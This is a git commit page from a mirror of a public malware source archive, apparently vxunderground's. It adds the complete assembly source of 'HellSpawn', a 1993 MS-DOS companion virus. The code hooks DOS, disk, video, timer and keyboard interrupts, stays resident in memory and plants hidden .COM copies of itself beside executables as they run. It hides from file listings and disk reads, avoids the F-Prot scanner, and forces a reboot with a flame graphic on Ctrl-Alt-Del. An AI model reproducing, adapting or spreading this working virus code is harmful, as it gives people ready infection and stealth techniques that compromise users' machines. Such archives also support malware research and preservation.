daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 23:39:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:44:11 -06:00
committed by GitHub
parent dc888afe59
commit dda6c7045d
99 changed files with 53487 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.hspawn.asm
+580
View File
@@ -0,0 +1,580 @@
; HellSpawn Virus (c) 1993 by Stormbringer
;
;
; Ò Stormbringer
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄ
; Ð
.model tiny
.radix 16
.code
org 100
start:
jmp EntryPoint
FindZero:
lodsb
or al,al
jne FindZero
cmp ds:[si-4],'XE'
je InfectOnOpen
cmp ds:[si-4],'OC'
jne Doneopen
OpenRequestedFile:
mov ax,3d00
pushf
call dword ptr cs:[IP_21]
xchg bx,ax
xor cx,cx
xor dx,dx
mov ax,4202
call FakeInt21
cmp ax,endmain-start
jne CloseUp
pop di si ds es dx cx bx ax
stc
retf 002
CloseUp:
jc CloseUp
mov ah,3e
call FakeInt21
doneOPen:
pop di si ds es dx cx bx ax
jmp Go21
InfectOnOpen:
pop di si ds es dx cx bx ax
jmp Execute
NewOpen:
push ax bx cx dx es ds si di
mov dx,si
jmp FindZero
Open:
push ax bx cx dx es ds si di
mov si,dx
jmp FindZero
Terminateprog:
mov byte ptr cs:[StealthOn],1
jmp Go21
Int21:
cmp ah,4c
je Terminateprog
or ah,ah
je Terminateprog
cmp byte ptr cs:[StealthOn],0
je AfterStealthChecks
cmp ah,11h
je FindFile
cmp ah,12h
je FindFile
cmp ah,4eh
je FindHandle
cmp ah,4fh
je FindHandle
AfterStealthChecks:
cmp ax,6c00
je NewOpen
cmp ah,3dh
je Open
cmp ax,4b00h
jne Go21
jmp Execute
Go21:
jmp dword ptr cs:[IP_21]
FindHandle:
pushf
call dword ptr cs:[IP_21]
jc ErrorHandleCall
push ax bx cx dx es ds si di
GetDTA:
mov ah,2f
call FakeInt21
cmp word ptr es:[bx+1a],endmain-start ;Check size
jne EndHandle
mov ah,byte ptr es:[bx+15]
and ah,2
jz Endhandle
pop di si ds es dx cx bx ax
mov ah,4f
jmp FindHandle
EndHandle:
pop di si ds es dx cx bx ax
clc
DoneHandleStealth:
retf 02
ErrorHandleCall:
mov ah,12
retf 02
FindFile:
call FakeInt21
cmp al,0ff
je ErrorFF
Stealth:
push ax bx cx dx es ds si di
mov ah,2f
call FakeInt21
cmp byte ptr es:[bx],0ff
jne NotExtended
add bx,7
NotExtended:
cmp word ptr [bx+9],'OC'
jne DoneFF
cmp word ptr [bx+1dh],endmain-start
jne DoneFF
FindNextFile:
pop di si ds es dx cx bx ax
mov ah,12
jmp FindFile
DoneFF:
pop di si ds es dx cx bx ax
iret
ErrorFF:
mov al,0ff
iret
Execute:
push ax bx cx dx es ds si di
call SetCritical
mov si,dx
FindEndOfFilename:
lodsb
or al,al
jne FindEndOfFilename
CheckForCHKDSK:
cmp word ptr ds:[si-9],'DK'
jne AfterChkdsk
mov byte ptr cs:[StealthOn],0
AfterChkdsk:
cmp byte ptr ds:[si-0a],'-' ;If it's f-prot, exit
je EndExec
cmp word ptr ds:[si-4],'XE'
jne EndExec
mov si,dx
mov di,offset filename
push cs
pop es
CopyFilename:
lodsb
stosb
or al,al
jne CopyFilename
push cs
pop ds
ChangeToCom:
mov word ptr es:[di-4],'OC'
mov byte ptr es:[di-2],'M'
CheckIfThere:
mov ax,3d00
mov dx,offset filename
call FakeInt21
xchg bx,ax
jnc CloseVirus
PlaceVirus:
mov ah,3c
mov cx,2
mov dx,offset Filename
call FakeInt21
jc EndEXEC
WriteVirus:
inc byte ptr [InfectionCounter]
xchg bx,ax
mov ah,40
mov cx,endmain-start
mov dx,100
call FakeInt21
CloseVirus:
mov ah,3e
call FakeInt21
EndExec:
call ResetCritical
pop di si ds es dx cx bx ax
jmp Go21
Error13:
stc
retf 02
Int13:
cmp ah,02
je IsDiskRead
jmp GoInt13
IsDiskRead:
pushf
call dword ptr cs:[IP_13]
jc Error13
AbsStealth:
push ax bx cx dx es ds si di
push cs
pop ds
mov di,bx
mov si,100
mov cx,100
repz cmpsb
jcxz IsVirus
jmp DoneAbsStealth
IsVirus:
mov di,bx
mov ax,9090
mov cx,0fe
repnz stosw
mov ax,20cdh
stosw
DoneAbsStealth:
pop di si ds es dx cx bx ax
clc
retf 002
EntryPoint:
push ds
mov ax,ds
dec ax
mov ds,ax
mov byte ptr ds:[0],'Z' ;Mark as last in chain
sub word ptr ds:[03],80 ;Allocate Space From MCB (2k)
sub word ptr ds:[12],80 ;Allocate Space From PSP (2k)
xor ax,ax
mov ds,ax
dec word ptr ds:[413] ;Allocate Memory From Bios (2k)
dec word ptr ds:[413]
mov ax,word ptr ds:[413]
CopyVirusToMem:
mov cl,6
shl ax,cl
sub ax,10
mov es,ax
pop ds
push ds
mov si,100
mov di,100
mov cx,end_prog-start
repnz movsb
;BX = IP of new int, CX = CS, DX = IntNum
;DI = address of interrupt storage
SetInterrupts:
xor ax,ax
mov ds,ax
cli
SetInt21:
mov ax,offset Int21
mov bx,es
xchg ax,word ptr ds:[21*4]
xchg bx,word ptr ds:[21*4+2]
mov word ptr es:[IP_21],ax
mov word ptr es:[CS_21],bx
SetInt13:
mov ax,offset Int13
mov bx,es
xchg ax,word ptr ds:[13*4]
xchg bx,word ptr ds:[13*4+2]
mov word ptr es:[IP_13],ax
mov word ptr es:[CS_13],bx
SetInt10:
mov ax,offset Int10
mov bx,es
xchg ax,word ptr ds:[10*4]
xchg bx,word ptr ds:[10*4+2]
mov word ptr es:[IP_10],ax
mov word ptr es:[CS_10],bx
SetInt1c:
mov ax,offset Int1c
mov bx,es
xchg ax,word ptr ds:[1c*4]
xchg bx,word ptr ds:[1c*4+2]
mov word ptr es:[IP_1c],ax
mov word ptr es:[CS_1c],bx
SetInt09:
mov ax,offset Int09
mov bx,es
xchg ax,word ptr ds:[09*4]
xchg bx,word ptr ds:[09*4+2]
mov word ptr es:[IP_09],ax
mov word ptr es:[CS_09],bx
sti
push cs
pop ds
mov byte ptr cs:[StealthOn],1
RunOriginalProgram:
mov ax,ds:[2c]
mov ds,ax
xor si,si
FindPath:
lodsw
or ax,ax
je FoundPath
dec si
jmp FindPath
FoundPath:
lodsw
ChangeFilenameToEXE:
push ds
pop es
mov di,si
xor al,al
mov cx,0ff
repnz scasb
mov word ptr es:[di-4],'XE'
mov byte ptr es:[di-2],'E'
push cs
pop es
mov ah,4a
mov bx,(end_prog-start+10f)/10
int 21
mov cx,di
sub cx,si
dec cx
mov di,offset Filename
mov al,cl
stosb
repnz movsb
mov byte ptr es:[di],0dh
mov si,offset Filename
push cs
pop ds
int 2e ;Execute Command
mov ax,4c00
int 21
FakeInt21:
pushf
call dword ptr cs:[IP_21]
ret
SetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,offset CriticalHandler
mov bx,cs
cli
xchg ds:[24*4],ax
xchg ds:[24*4+2],bx
mov word ptr cs:[CS_24],bx
mov word ptr cs:[IP_24],ax
sti
pop ds bx ax
ret
ResetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[IP_24]
mov bx,word ptr cs:[CS_24]
cli
mov word ptr ds:[24*4],ax
mov word ptr ds:[24*4+2],bx
sti
pop ds bx ax
ret
CriticalHandler:
mov al,3
iret
Credits db 'HellSpawn v0.91a (c) 1993 by Stormbringer'
EndCred:
Int10:
cmp ah,0
jne GoInt10
mov byte ptr cs:[FireActive],0
cmp al,13
jne GoInt10
mov byte ptr cs:[FireActive],1
GoInt10:
db 0ea
IP_10 dw 0
CS_10 dw 0
Int09:
push ax
in al,60h
cmp al,53h
je IsDel
NotCtrlAltDel:
pop ax
GoInt09:
db 0ea
IP_09 dw 0
CS_09 dw 0
IsDel:
mov ah,2
int 16
and al,1100b
cmp al,0c
jne NotCtrlAltDel
RebootActivation:
mov di,0b800
mov es,di
push cs
pop ds
mov si,offset Fire
mov ax,03
int 10
mov di,550
mov cx,7
BtBigLoop:
push cx
BtDrawFireLine:
mov cx,8
FireLine:
lodsb
mov ah,'Û'
xchg ah,al
stosw
loop FireLine
pop cx
add di,90
loop BtBigLoop
ColdBoot:
db 0ea
db 0,0,0ff,0ff
Int1c:
cmp byte ptr cs:[FireActive],1
jne JmpInt1c
push ax bx cx dx es ds si di
call DrawFire
call ReverseFlame
pop di si ds es dx cx bx ax
JmpInt1c:
db 0ea
IP_1c dw 0
CS_1c dw 0
DrawFire:
push cs
pop ds
mov si,offset Fire
mov di,0a000
mov es,di
xor di,di
mov cx,7
FireLoop:
push cx
mov cx,8
repnz movsb
add di,312d
pop cx
loop FireLoop
ret
ReverseFlame:
push cs cs
pop es ds
mov si,offset Fire
mov cx,7
FlipAll:
push cx
mov cx,4
mov di,si
add di,7
FlipLine:
mov al,byte ptr [si]
xchg al,byte ptr [di]
mov byte ptr [si],al
dec di
inc si
loop FlipLine
pop cx
loop FlipAll
ret
Fire:
db 00,04,00,00,00,00,00,00
db 00,04,0c,04,00,00,00,00
db 00,00,04,0c,04,00,00,00
db 00,00,04,0c,04,04,00,00
db 00,00,04,0e,0c,04,00,00
db 00,04,04,0c,0e,0c,04,00
db 04,04,0c,0e,0f,0c,0c,04
FireActive db 0
InfectionCounter db 0
GoInt13:
db 0ea
endmain:
IP_13 dw ?
CS_13 dw ?
IP_21 dw ?
CS_21 dw ?
CS_24 dw ?
IP_24 dw ?
StealthOn db ?
filename db 50 dup(?)
end_prog:
end start